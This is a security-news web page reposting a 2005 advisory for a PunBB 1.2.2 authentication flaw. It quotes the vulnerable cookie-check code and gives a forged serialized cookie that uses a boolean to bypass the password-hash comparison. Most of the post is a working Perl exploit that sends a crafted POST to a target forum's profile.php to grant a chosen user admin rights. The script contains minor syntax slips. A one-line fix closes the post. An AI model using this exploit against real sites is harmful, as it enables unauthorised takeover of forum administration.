Main Menu
Network
Sponsor
Top 10 Sites
Partners
|
|
Top Submit newsSubscribe 
Communication | Computer Crime | Digital Audio, Video, Photo | General News | Hardware | Internet | Mobile | PDA | Security | Software | Vulnerability |
Previous articleBack to news listNext article
| Sponsored links | Want to become one of our authors and see your work published on ALLSeek.iNFO ?
| | PunBB Admin Access Bypass Exploit |
|---|
Categorie: Vulnerability
Posted: 2005-04-08 by basher13
Views: 1157
| Current Rating: Not rated
|
| | Details |
|---|
Update:
11:35 PM 3/28/2005
Subject:
" PunBB Admin Access Bypass Exploit "
Vulnerable version:
punBB 1.2.2
Description:
In short, PunBB is a fast and lightweight PHP-powered discussion board.
It is released under the GNU Public License. Its primary goal is to
be a faster, smaller and less graphic alternative to otherwise excellent
discussion boards such as phpBB, Invision Power Board and vBulletin.
PunBB has fewer features than many other discussion boards, but is generally
faster and outputs smaller pages.
Vulnerability:
Vulnerability has found in functions.php script that let user ID get
admin ID forum rights.
sample source vulnerable file /include/functions.php ;
?
(..)
function check_cookie(&$pun_user)
{
...
if (isset($_COOKIE[$cookie_name]))
list($cookie['user_id'], $cookie['password_hash']) = @unserialize($_COOKIE[$cookie_name]);
if ($cookie['user_id'] > 1)
{
// Check if there's a user with the user ID and password hash from the cookie
$result = $db->query('SELECT .... tra-la-la... );
$pun_user = $db->fetch_assoc($result);
// If user authorisation failed
if (!isset($pun_user['id']) || md5($cookie_seed.$pun_user['password']) != $cookie['password_hash'])
(..)
?
We can logging with any user id if we use boolean value in cookie password_hash
,evil cookie is : a:2:{i:0;s:1:"2";i:1;b:1;} where 2 is user id
Exploit:
#!/usr/bin/perl
# PunBB Admin Access Bypass Exploit
# ------------------------------------
#
# Greats: 1dt.w0lf (has discovered bug)
# info: 98.to/infamous
use IO::Socket;
if (@ARGV < 4)
{
system "clear";
print "\nPunBB Admin Access Bypass Exploit\n\n";
print "---------------------------------\n";
print "INFGP - Hacking&Security Research\n;
print "\n\n";
print "[-]Usage: pnbbexp.pl [host] [path] [admin ID] [user ID] \n";
print "[!]Exam: pnbbexp.pl www.target.com forum 2 13 \n";
exit(1);
}
system "clear";
$server = $ARGV[0];
$folder= $ARGV[1];
$adm= $ARGV[2];
$usr= $ARGV[3];
system "clear";
print "\n[+]Connecting to host:\n\n";
print $server;
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80"); unless ($socket)
{
die "[-]$server connection [FAILED]\n"
}
print "[+]Creating socket [OK]\n");
print "[+]Sent 0day..\n\n";
$string = 'Group membership saved';
$cook = 'a:2:{i:0;s:'.length($adm).':"'.$adm.'";i:1;b:1;}';
$form = 'form_sent=1&group_id=1&update_group_membership=Save';
$cook =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
print $socket "POST /$folder/profile.php?section=admin&id=$usr&action=foo HTTP/1.0\n";
print $socket "Connection: Keep-Alive\n";
print $socket "Pragma: no-cache\n";
print $socket "Cache-control: no-cache\n";
print $socket "Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\n";
print $socket "Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identity\n";
print $socket "Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5\n";
print $socket "Accept-Language: en\n";
print $socket "Host: $server\n";
print $socket "Referer: http://$server/$folder/profile.php?section=admin&id=$usr&action=foo \n";
print $socket "User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041111 Firefox/1.0\n";
print $socket "Cookie: punbb_cookie=$cook\n";
print $socket "Content-Type: application/x-www-form-urlencoded \n";
print $socket "Content-Length: ".length($form)."\n\n";
print $socket "$form\n\n";
while(<$socket>)
{
if(/$string/)
{
print "[+]Group membership saved..[OK]\n";
print "[>]Now user whit ID $usr have admin status\n";
}
close($socket);
Solution:
if (!isset($pun_user['id']) || md5($cookie_seed.$pun_user['password']) != $cookie['password_hash'])
change to
if (!isset($pun_user['id']) || md5($cookie_seed.$pun_user['password']) !== $cookie['password_hash'])
^^ put more '='
Vendor URL:
http://www.punbb.org
| | Syndication |
|---|
Permalink Email this
The URI to TrackBack this entry is:
http://allseek.info/news/trackback.php?id=1460
| | User comments (post your comments ) |
|---|
Only registerd members can post comments and articles
|
| Previous articleBack to news listNext article
|
|
|
|
InterJOB.su
|
